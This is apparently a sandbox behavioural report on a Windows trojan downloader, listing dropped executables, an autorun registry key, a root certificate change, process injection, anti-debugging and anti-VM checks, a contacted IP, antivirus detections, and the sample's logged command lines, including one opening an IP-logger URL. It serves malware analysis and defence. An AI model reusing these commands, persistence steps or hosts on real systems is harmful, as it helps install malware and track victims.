NtAllocateVirtualMemory Dec. 12, 2022, 9:39 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93f00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Dec. 12, 2022, 9:39 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93e4b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Dec. 12, 2022, 9:39 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93f75000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Dec. 12, 2022, 9:39 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93f76000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Dec. 12, 2022, 9:39 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93e5d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Dec. 12, 2022, 9:39 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93f77000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Dec. 12, 2022, 9:39 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93f78000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Dec. 12, 2022, 9:39 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93f79000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Dec. 12, 2022, 9:39 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93e6b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1

Checks whether any human activity is being performed by constantly checking whether the foreground window changed

A process attempted to delay the analysis task. (1 event)

description

Cixydusuno.exe tried to sleep 129 seconds, actually delayed analysis time by 129 seconds

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (1 event)

Time & API	Arguments	Status	Return	Repeated
GetDiskFreeSpaceExW Dec. 12, 2022, 9:40 a.m.	total_number_of_free_bytes: 0 free_bytes_available: 9928577024 root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Explorer total_number_of_bytes: 0	1	1	0

Creates executable files on the filesystem (10 events)

file	C:\Users\test22\AppData\Local\Temp\is-OAQ81.tmp\zizou.exe
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\powerOff.lnk
file	C:\Users\Public\Desktop\powerOff.lnk
file	C:\Users\test22\AppData\Local\Temp\is-OAQ81.tmp\idp.dll
file	C:\Program Files\Internet Explorer\TYXARZQJPU\poweroff.exe
file	C:\Users\test22\AppData\Local\Temp\is-OAQ81.tmp\_isetup\_shfoldr.dll
file	C:\Users\test22\AppData\Local\Temp\ba-b2258-594-d99be-c73a4e8edf7b0\Cixydusuno.exe
file	C:\Users\test22\AppData\Local\Temp\12-cb453-02a-f619c-a985aaa955f37\Tenukaeqaefe.exe
file	C:\Program Files (x86)\Google\SHesypalori.exe
file	C:\Users\test22\AppData\Local\Temp\is-HQVUQ.tmp\_isetup\_shfoldr.dll

Creates a shortcut to an executable file (4 events)

file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Command Prompt.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sidebar.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\powerOff.lnk
file	C:\Users\Public\Desktop\powerOff.lnk

Creates a suspicious process (1 event)

cmdline

"C:\Windows\System32\cmd.exe" /c start https://iplogger.com/1bDHA4.jpg

Drops a binary and executes it (3 events)

file	C:\Program Files\Internet Explorer\TYXARZQJPU\poweroff.exe
file	C:\Users\test22\AppData\Local\Temp\ba-b2258-594-d99be-c73a4e8edf7b0\Cixydusuno.exe
file	C:\Users\test22\AppData\Local\Temp\12-cb453-02a-f619c-a985aaa955f37\Tenukaeqaefe.exe

Drops an executable to the user AppData folder (7 events)

file	C:\Users\test22\AppData\Local\Temp\is-ERPDQ.tmp\poweroff.tmp
file	C:\Users\test22\AppData\Local\Temp\ba-b2258-594-d99be-c73a4e8edf7b0\Cixydusuno.exe
file	C:\Users\test22\AppData\Local\Temp\12-cb453-02a-f619c-a985aaa955f37\Tenukaeqaefe.exe
file	C:\Users\test22\AppData\Local\Temp\is-OAQ81.tmp\_isetup\_shfoldr.dll
file	C:\Users\test22\AppData\Local\Temp\is-OAQ81.tmp\idp.dll
file	C:\Users\test22\AppData\Local\Temp\is-OAQ81.tmp\zizou.exe
file	C:\Users\test22\AppData\Local\Temp\is-E7HTF.tmp\CR3.tmp

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Dec. 12, 2022, 9:41 a.m.	process_identifier: 2792 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 16 (PAGE_EXECUTE) base_address: 0x05910000 process_handle: 0xffffffff	1	0	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Dec. 12, 2022, 9:39 a.m.	flags: 15 family: 0		111	0

An executable file was downloaded by the process cr3.tmp (1 event)

Time & API	Arguments	Status	Return	Repeated
InternetReadFile Dec. 12, 2022, 9:39 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL«pðà"0ZH¾x @ @hxSFà H.textÄX Z `.rsrcFF\@@.relocà¢@B xH0Ï8©,ØP«A®P#X«úEBsS2Kûõô«çAÑD¾©¨ö¥@aVêÚgÿ_.²) FN¶mîPáU9c·ú°Po¼;ÊXç§;éò ìÖâ× ª£Jî2åaÝùÎkDËMøzplõgHÑYÎéSHh¡ü8ÕJ6oEK©J;zøy¥1uîEÇ ÔûÎÉþÏ¼@)~Äï óéæ%g(AJeNf@cÜªÝUÑô">^àr·ÎÏR«!W(°ÙJîg¾öÿ6oVÑxRFÁT5L%H}»øÝðl©µ»Rõ'¾<9x(ÿ¡<È§¿&#±Ä`*ÀzËS°ýÂ@íÒ³~[]- Ç\1r½Zóªû[§roÍ¢àno³î>Ãô«©xÏÏ«¾³¹üôOYÞ#ulV2X@íé]0K¥%ªã7²¤×d¥ù¡<TM}ØìDCÎ5F_88áôâ.¡ÝFö}ØJÌ¢%GªóDá:H request_handle: 0x00cc000c	1	1	0

Yara rule detected in process memory (16 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Queries for potentially installed applications (4 events)

Time & API	Arguments	Return
RegOpenKeyExA Dec. 12, 2022, 9:40 a.m.	regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\{A99C48CB-3323-443F-88FB-F6FF96326429}_is1 base_handle: 0x80000001 key_handle: 0x00000000 options: 0 access: 0x00000001 regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\{A99C48CB-3323-443F-88FB-F6FF96326429}_is1	2
RegOpenKeyExA Dec. 12, 2022, 9:40 a.m.	regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\{A99C48CB-3323-443F-88FB-F6FF96326429}_is1 base_handle: 0x80000002 key_handle: 0x00000000 options: 0 access: 0x00000001 regkey: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\{A99C48CB-3323-443F-88FB-F6FF96326429}_is1	2
RegOpenKeyExA Dec. 12, 2022, 9:40 a.m.	regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\{A99C48CB-3323-443F-88FB-F6FF96326429}_is1 base_handle: 0x80000001 key_handle: 0x00000000 options: 0 access: 0x00000008 regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\{A99C48CB-3323-443F-88FB-F6FF96326429}_is1	2
RegOpenKeyExA Dec. 12, 2022, 9:40 a.m.	regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\{A99C48CB-3323-443F-88FB-F6FF96326429}_is1 base_handle: 0x80000002 key_handle: 0x00000000 options: 0 access: 0x00000008 regkey: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\{A99C48CB-3323-443F-88FB-F6FF96326429}_is1	2

Uses Windows utilities for basic Windows functionality (8 events)

cmdline	"C:\Program Files (x86)\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
cmdline	C:\Program Files\Internet Explorer\TYXARZQJPU\poweroff.exe /VERYSILENT
cmdline	C:\Program Files (x86)\Internet Explorer\iexplore.exe https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
cmdline	"C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2368 CREDAT:145409
cmdline	"C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2480 CREDAT:145409
cmdline	"C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome
cmdline	"C:\Users\test22\AppData\Local\Temp\is-ERPDQ.tmp\poweroff.tmp" /SL5="$50024,490199,350720,C:\Program Files\Internet Explorer\TYXARZQJPU\poweroff.exe" /VERYSILENT
cmdline	"C:\Program Files\Internet Explorer\TYXARZQJPU\poweroff.exe" /VERYSILENT

Communicates with host for which no DNS query was performed (1 event)

host

95.214.24.96

Looks for the Windows Idle Time to determine the uptime (1 event)

Time & API	Arguments	Status	Return	Repeated
NtQuerySystemInformation Dec. 12, 2022, 9:41 a.m.	information_class: 8 (SystemProcessorPerformanceInformation)	1	0	0

Installs itself for autorun at Windows startup (1 event)

reg_key

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover

reg_value

"C:\Program Files (x86)\Google\SHesypalori.exe"

Attempts to create or modify system certificates (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob

Network activity contains more than one unique useragent (2 events)

process	CR3.tmp				useragent	InnoDownloadPlugin/1.5
process	iexplore.exe				useragent	Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)

Resumed a suspended thread in a remote process potentially indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2368 resumed a thread in remote process 2792
Process injection	Process 2480 resumed a thread in remote process 2696
NtResumeThread Dec. 12, 2022, 9:40 a.m.	thread_handle: 0x0000030c suspend_count: 1 process_identifier: 2792	1	0	0
NtResumeThread Dec. 12, 2022, 9:41 a.m.	thread_handle: 0x00000368 suspend_count: 1 process_identifier: 2696	1	0	0

Uses Sysinternals tools in order to add additional command line functionality (1 event)

cmdline

"C:\Program Files (x86)\powerOff\Power Off.exe" -silent -desktopShortcut -programMenu

Generates some ICMP traffic

File has been identified by 39 AntiVirus engines on VirusTotal as malicious (39 events)

Bkav	W32.AIDetect.malware2
Lionic	Riskware.Win32.Babar.1!c
Elastic	malicious (high confidence)
Cynet	Malicious (score: 99)
McAfee	RDN/Generic.dx
Malwarebytes	Trojan.Dropper
VIPRE	Gen:Variant.Babar.125028
Sangfor	Downloader.Msil.Agent.Vmvb
Alibaba	TrojanDownloader:MSIL/Generic.187546cc
Cybereason	malicious.278bea
Cyren	W32/ABRisk.BYET-4883
Symantec	Trojan.Gen.MBT
APEX	Malicious
Kaspersky	Trojan-Downloader.MSIL.Csdi.fg
BitDefender	Gen:Variant.Babar.125028
MicroWorld-eScan	Gen:Variant.Babar.125028
Avast	FileRepMalware [Misc]
Ad-Aware	Gen:Variant.Babar.125028
Emsisoft	Gen:Variant.Babar.125028 (B)
TrendMicro	Trojan.Win32.PRIVATELOADER.YXCLKZ
McAfee-GW-Edition	BehavesLike.Win32.AdwareFileTour.fc
FireEye	Gen:Variant.Babar.125028
Sophos	Mal/Generic-S (PUA)
GData	Gen:Variant.Babar.125028
Avira	HEUR/AGEN.1233171
Kingsoft	Win32.TrojDownloader.MSIL.fg.(kcloud)
Gridinsoft	Malware.Win32.Phonzy.cl
Arcabit	Trojan.Babar.D1E864
ZoneAlarm	Trojan-Downloader.MSIL.Csdi.fg
Microsoft	Trojan:Script/Phonzy.A!ml
Google	Detected
AhnLab-V3	Malware/Win.Generic.C5190104
ALYac	Gen:Variant.Babar.125028
MAX	malware (ai score=83)
Cylance	Unsafe
TrendMicro-HouseCall	Trojan.Win32.PRIVATELOADER.YXCLKZ
Tencent	Msil.Trojan-Downloader.Csdi.Dwnw
Fortinet	W32/PossibleThreat
AVG	FileRepMalware [Misc]

CR3.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All